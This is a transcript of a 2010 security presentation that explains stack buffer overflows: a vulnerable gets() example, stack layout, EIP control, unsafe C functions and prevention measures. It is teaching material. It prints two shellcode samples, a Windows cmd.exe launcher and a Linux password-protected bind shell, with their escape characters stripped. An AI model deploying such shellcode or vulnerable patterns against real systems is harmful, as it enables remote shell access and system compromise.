Buffer Overflow Demo by Saurabh Sharma

Buffer Overflows
by: Saurabh Sharma

BUFFER

Buffer: The memory area where the user input is stored.
Overflow: The user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas.
Anatomy of Buffer Overflows

void get_input() {
char buf[1024];
gets(buf);
}
void main(intargc, char*argv[]){
get_input();
}
User controls the input. Malicious user can supply the input of more than 500 chars. So what ??
User can supply a malicious input which can execute some other exe. This can also be your cmd.exe and may lead to the system compromise.
A small example

Text: Contains instructions
Data: Contains initialized variables
BSS: Contains uninitialized global and static variables(initialized to 0)
Heap: Contains dynamic, uninitialized data(malloc())
Stack: Contains function arguments and local variables
Memory overview

Stack Frame:holds variables and data for function
Stack grows from higher memory location to lower memory location
Heap: lower to higher
Memory overview

General purpose: For basic calculations.
ESI, EDI: Used mostly with arrays
Flags: Outcome of several instructions set the flags
Segment: Code, stack, data.
EBP:Base pointer, points to the beginning of the current stack frame
ESP: Stack pointer, points to the top of the stack
EIP: Instruction pointer, points to the next instruction
REGISTERS

Stack is a LIFO data structure. Temporary memory, formed when the function called.
A new stack frame created when the function is called.
The return address is saved just above the local variables.
Stack Layout
Lower address
parameters
Return addr(saved EIP)
Saved EBP
Stack grows
Local variables
Higher address

So, if the EIP can be controlled, the next instruction to be executed can be controlled.
Stack Layout
Lower address
parameters
Return addr(saved EIP)
Saved EBP
Stack grows
Local variables
Higher address

Machine code which is injected into the overflown buffer
Does the work for you
WORK: executing a third program, adding an administrator etc.
SHELLCODE

win32/xp sp2 (En) cmd.exe 23 bytes
Author : MountassifMoad A.K.A :
"x8bxecx68x65x78x65" "x20x68x63x6dx64x2e" "x8dx45xf8x50xb8x8D" "x15x86x7Cxffxd0";
EXAMPLE SHELLCODES(SMALL)

BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]=
"x31xdbx53x43x53x6ax02x89xe1xb0x66xcdx80" "x31xd2x52x66x68xbcx0ax66x6ax02x89xe2x6a" "x10x52x6ax03x89xe1xfexc3xb0x66xcdx80x6a" "x02x6ax03x89xe1xb3x04xb0x66xcdx80x31xc9" "x51x51x6ax03x89xe1xfexc3xb0x66xcdx80x31" "xdbx53x6ax3ax68x50x61x73x73x89xe6x6ax05" "x56x6ax04x89xe1xb3x09xb0x66xcdx80x31xc9" "x31xf6x51x6ax05x52x6ax04x89xe1xb3x0axb0" "x66xcdx80x31xc9x51x6ax72x68x68x61x78x6f" "x89xe7x89xd6x80xc1x05xfcxf3xa6x75xbfx31" "xc9xb3x04xb0x3fxcdx80x41x83xf9x03x75xf6" "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6e" "x89xe3x50x53x89xe1x31xd2xb0x0bxcdx80xb0" "x01xcdx80"
EXAMPLE SHELLCODES(bigger)

strcpy()
strcat()
sprintf()
scanf()
sscanf()
fscanf()
vfscanf()
vsprintf
vscanf()
vsscanf()
streadd()
strecpy()
strtrns()
MAJOR SNARES

Buffer size must be checked
Use alternative functions e.g. strncpy(dst, src, dst_size-1) instead of strcpy(dst, src)
Other protection mechanisms like /GS(stack cookie), ASLR, SafeSEH compilation
PREVENTION

http://www.cccure.org/amazon/idssignature.pdf
http://www.shell-storm.org/papers/files/539.pdf
http://c0re.23.nu/~chris/data/bo-2004.pdf
http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf
REFERENCES

?????????????????
QUESTIONS

http://null.co.in	25
http://nullpresentations.blogspot.com	10
http://www.nullpresentations.blogspot.com	1

Buffer Overflow Demo by Saurabh Sharma

by n|u - The Open Security Community on Jul 10, 2010

Accessibility

Categories

Upload Details

Usage Rights

3 Embeds 36

Statistics

Buffer Overflow Demo by Saurabh Sharma — Presentation Transcript